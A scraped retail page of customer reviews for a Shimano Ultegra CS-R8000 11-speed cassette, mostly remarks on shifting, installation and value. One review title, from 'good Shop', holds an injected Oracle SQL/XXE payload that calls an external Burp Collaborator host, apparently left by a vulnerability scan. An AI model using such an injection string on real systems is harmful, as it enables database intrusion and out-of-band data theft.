X
Signin to Your Account
Questions? Call our tri Specialists! 1-800-445-4790
COVID-19 Response
Shimano Ultegra CS-R8000 11 Speed Cassette

ShimanoUltegra CS-R8000 11 Speed Cassette(Return to Product Page)

Add your own review
(42 customer reviews)
5 stars
4 stars
3 stars
2 stars
1 stars
(34)
(8)
(0)
(0)
(0)
(81%)
(19%)
(0%)
(0%)
(0%)
Cassette works well
by Daniel
Cycling Enthusiast
Tualatin, OR

About every 4th chain I replace my cassette, and this one does the job well.

Reviewed 10/12/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
Almost seamless
by Tuabui
Charlotte NC

I currently use the Ultegra CS5800 11 speed group set. Actually, this group set comes with the 105 11 speed cassette. My goal was to be able to switch out seamlessly with my current wheels so when I had a chance to buy a similar brand wheel sets but deeper, I bought the CS-R8000 cassette. The installation was simple but you will need a proper torque wrench to fit the Shimano cassette to the proper spec. You may need to adjust the brake pads to make sure there is no rubbing. I did not have to adjust the rear derailleur as the shifting was dead on. The sound coming from the new cassette as the shifting takes place was loud and crisp. The sound level is still crisp but less noticeable as the teeth began to wear and sits precisely on the chain. It feels great riding with a new cassette. I may have eliminated a few grams compared to the 105 cassette. I have put in 200 miles so far and enjoying the new cassette and deep wheels.

Reviewed 8/27/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
32t is just that little extra
by GDS PDX
Cycling Enthusiast
Portland, Oregon

I got a set of climbing specific wheels and wanted a cassette that would leverage that even further. The 32-11 was a good call. I really don't use the 32 that often (most climbs are fine with the 30) but when you hit a wall and need just a little more leverage and a little more confidence, the 32 is nice to have. I was worried about chain length because my other wheelset has a 30-11, but I have had no problem. If I was moving from a 28 to a 32, I'd probably need an extra link or two, but the 30-32 switch has performed fine on an Ultergra Di2 longcage derailleur.

Reviewed 5/21/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
Ultegra Quality
by ShayneB
Louisville, KY

Solid cassette at a great price. Installed on a new wheelset. Shifting is smooth and precise. Does everything it is designed to do well.

Reviewed 9/20/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Great product
by Anonymous

It is well made and worth the extra money over the 105.

Reviewed 8/8/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
Much better than 6800
by EnriqueC
Cycling Enthusiast
Near Memphis TN

Every 8-10k miles or once a year and every other Dura-Ace chain, I get a new cassette. This new 8000 series makes shifting smooth and reliable. It's easy to clean and to install.

Reviewed 6/15/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
Good performance !
by Anonymous

Work perfect with my groupset !

Reviewed 6/5/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
Does what it's supposed to
by Anonymous
Competitive Racer
Huntsville, AL
2 of 2 customers found this review helpful.

Nothing overly special. It's a cassette that works well. Shifting is smooth and cassette is quiet in operation. I am using a KMC X11SL chain with no problems. I've had Dura-Ace cassettes and from a functionality standpoint there is no difference with the Ultegra cassettes.

Reviewed 5/29/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
THE RIGHT PRICE FOR GOOD VALUE
by THE BRAD
Cycling Enthusiast
ST. LOUIS, MO

I LOVE THE CASSETTE AND SHIMANO HAS BEEN EXCELLENT DRIVE TRAIN FOR ME SINCE 1986

Reviewed 5/28/2020
Was this review useful to you? Yes/No
Thank you for your feedback.
awesome
by Aaron
Cycling Enthusiast
1 of 1 customers found this review helpful.

love it... quiet.. use it on sram etap... i think it is better than red cassettes

Reviewed 12/6/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
No drop off from DuraAce
by Gwpelham
Cycling Enthusiast
Northern Nevada
2 of 2 customers found this review helpful.

Used to replace Dura Ace cassette. Its heavier but no drop off in shifting.

Reviewed 9/17/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
Smooth shifting
by Cat6Junior
Competitive Racer
Georgia
2 of 2 customers found this review helpful.

I have been riding SRAM for the past 10 Years and I changed to Shimano last year. The shifting is smooth as butter and easy on the hands. So far it has been a good change.

Reviewed 9/11/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
50 miles a week
by Anonymous
Nashville
1 of 1 customers found this review helpful.

Upgraded from an 12-25 105 cassette to an 11-28 Ultegra cassette (hills) and can actually feel smoother shifting with all of the rest of the components remaining 105.

Reviewed 9/14/2018
Was this review useful to you? Yes/No
Thank you for your feedback.
(select extractvalue(xmltype('?xml version1.0 encodingUTF-8?!DOCTYPE root !ENTITY % wcjvu SYSTEM httpgbv9wq4w2cjy933aknxk3gs1ys4rsiu6xuphg55.burpcollab''orator.net%wcjvu,'),'l') from
by good Shop
Cycling Enthusiast
good Shop
0 of 1 customers found this review helpful.

good Shop

Reviewed 12/10/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
by good Shop
Cycling Enthusiast
good Shop
0 of 1 customers found this review helpful.

good Shop

Reviewed 12/10/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
xz0qk7sdqt7fxkrr84l1rxgim9s8gzinafy7ly9n
by good Shop
Cycling Enthusiast
good Shop
0 of 1 customers found this review helpful.

good Shop

Reviewed 12/10/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Just great!
by Anonymous
2 of 2 customers found this review helpful.

Best for uphill.

Reviewed 11/28/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Great range of gears at a good price.
by Merlin
Cycling Enthusiast
Portland, OR
2 of 2 customers found this review helpful.

I wanted the wide gear range available in this cassette and also was glad I could get it at a decent price. I have one of these on another bike and it has lasted a very long time. This one should also last a long time. This is a very good cassette that I'll buy again if the need arises.

Reviewed 6/3/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
ongoing maintenance
by Anonymous
Cycling Enthusiast

started to have poor shifting while on the trainer and realized lubrication was not the issue. Worn cassette and idler wheels were actually the culprits. Installed new cassette and idlers-voila! problems solved

Reviewed 1/21/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Great product that I use on all my bikes
by Anonymous
Competitive Racer
0 of 2 customers found this review helpful.

Shimano Ultegra is installed on all my bikes. Never fails me.

Reviewed 1/6/2019
Was this review useful to you? Yes/No
Thank you for your feedback.
Next Page